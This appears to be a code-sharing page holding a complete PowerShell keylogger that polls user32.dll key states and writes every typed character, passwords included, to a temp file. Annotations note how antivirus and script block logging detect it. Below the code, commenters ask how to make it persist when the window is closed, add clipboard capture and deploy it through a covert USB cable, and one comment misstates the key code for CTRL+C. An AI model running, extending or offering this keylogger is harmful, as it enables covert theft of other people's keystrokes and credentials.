#requires -Version 2 | |
# Start-KeyLogger: keystroke capture by polling user32.dll, kept here as a
# reference sample of the technique.
#   -Path  file that receives the captured characters
#          (default: "$env:temp\keylogger.txt").
# Flow, as written below: compile four user32.dll P/Invoke signatures with
# Add-Type, create the output file, then poll GetAsyncKeyState for key codes
# 9..254 every 40 ms and append each translated character to the file.
# CTRL+C ends the loop and the finally block opens the file in Notepad.
#
# Review notes (detection and handling):
# - The script text names GetAsyncKeyState / GetKeyboardState / MapVirtualKey /
#   ToUnicode inside an Add-Type member definition. A reader further down this
#   page reports the script being blocked by antivirus with
#   ScriptContainedMaliciousContent, so content scanning does flag it.
# - With PowerShell script block logging enabled (event ID 4104), the same
#   text is recorded, which makes those API names a usable hunting string.
# - Captured text is written unencrypted to a file under the user's temp
#   directory; anything typed while the loop runs, passwords included, stays
#   readable there until the file is removed.
function Start-KeyLogger($Path="$env:temp\keylogger.txt") | |
{ | |
# C# P/Invoke declarations for the four user32.dll functions used below.
# The here-string is passed verbatim to Add-Type, so its content is code,
# not commentary.
$signatures = @' | |
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] | |
public static extern short GetAsyncKeyState(int virtualKeyCode); | |
[DllImport("user32.dll", CharSet=CharSet.Auto)] | |
public static extern int GetKeyboardState(byte[] keystate); | |
[DllImport("user32.dll", CharSet=CharSet.Auto)] | |
public static extern int MapVirtualKey(uint uCode, int uMapType); | |
[DllImport("user32.dll", CharSet=CharSet.Auto)] | |
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); | |
'@ | |
# Compile the declarations into the type API.Win32 and keep the returned type
# in $API so the static methods can be called as $API::Name(...).
$API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru | |
# Create the output file; -Force replaces an existing file at $Path, and
# assigning to $null discards the returned file object.
$null = New-Item -Path $Path -ItemType File -Force | |
try | |
{ | |
Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red | |
# Endless loop. CTRL+C interrupts it, after which the finally block below
# runs and opens the collected text.
while ($true) { | |
# Pause 40 ms between polling passes.
Start-Sleep -Milliseconds 40 | |
# Walk key codes 9..254. They are passed to GetAsyncKeyState as its
# virtualKeyCode argument, so they are virtual-key codes, not ASCII codes
# (the loop variable name notwithstanding).
for ($ascii = 9; $ascii -le 254; $ascii++) { | |
# Query the asynchronous state of this key.
$state = $API::GetAsyncKeyState($ascii) | |
# -32767 is 0x8001 read as a signed 16-bit value: highest and lowest bit set.
# Per the Win32 documentation that means "down now, and pressed since the
# previous GetAsyncKeyState call". It is a return value, not a character code.
if ($state -eq -32767) { | |
# Reads the CapsLock property and discards it; the value is not used
# anywhere in this block.
$null = [console]::CapsLock | |
# Call MapVirtualKey with the key code and map type 3; the result is handed
# to ToUnicode below as its wScanCode argument.
$virtualKey = $API::MapVirtualKey($ascii, 3) | |
# Fetch the 256-byte keyboard state array. The return value stored in
# $checkkbstate is never checked.
$kbstate = New-Object Byte[] 256 | |
$checkkbstate = $API::GetKeyboardState($kbstate) | |
# StringBuilder that ToUnicode fills with the translated character(s).
$mychar = New-Object -TypeName System.Text.StringBuilder | |
# Translate the key using the keyboard state fetched above. $success holds
# ToUnicode's integer return value and is tested as a boolean, so any
# non-zero result takes the branch.
$success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0) | |
if ($success) | |
{ | |
# Append the character(s) to the log, encoded as UTF-16
# ([System.Text.Encoding]::Unicode). One AppendAllText call per keystroke.
[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) | |
} | |
} | |
} | |
} | |
} | |
finally | |
{ | |
# Runs when the loop is interrupted: open the log file in Notepad. This is a
# visible window on the interactive desktop.
notepad $Path | |
} | |
} | |
# Script entry point: recording starts as soon as the file is run and lasts
# until CTRL+C aborts it; the collected text is then opened in Notepad.
Start-KeyLogger |
can anyone make this.,, instead of pressing Control + C, for just closing it [X] or killing the process[powershell.exe], it will autosave to c:\keylogger.txt
Thanks
can anyone make this.,, instead of pressing Control + C, for just closing it [X] or killing the process[powershell.exe], it will autosave to c:\keylogger.txt
Thanks
(2)
I really thought that just by replacing CTRL+C to CTRL+"another letter" would work.
But it does not. The message does display the new combination, since I replaced every CTRL+C with CTRL+"another letter". The script still stops only on CTRL+C, although I found that CTRL+C only works after pressing CTRL+"another letter" first. At the end of the day that is good enough for me: it adds peace of mind that copying some text won't accidentally stop the logger.
Also i noticed that it logs CTRL presses as odd rectangular boxes in the log.
Any idea how to log contents from clipboard as well in the same log?
CTRL + C is ASCII Code 32767.
3 - ETX (end of text)
27 - is marked as ESC
67 - C
The CTRL key does not have its own ASCII code, however the code above works as CTRL + C.
https://www.quora.com/What-is-the-ASCII-code-for-the-CTRL-key
Does this work on a usb ninja cable
my antivirus prevented it from running:
Este script contiene elementos malintencionados y ha sido bloqueado por el software antivirus.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
Easy to use without any downloads. Highly recommended! 👍 💯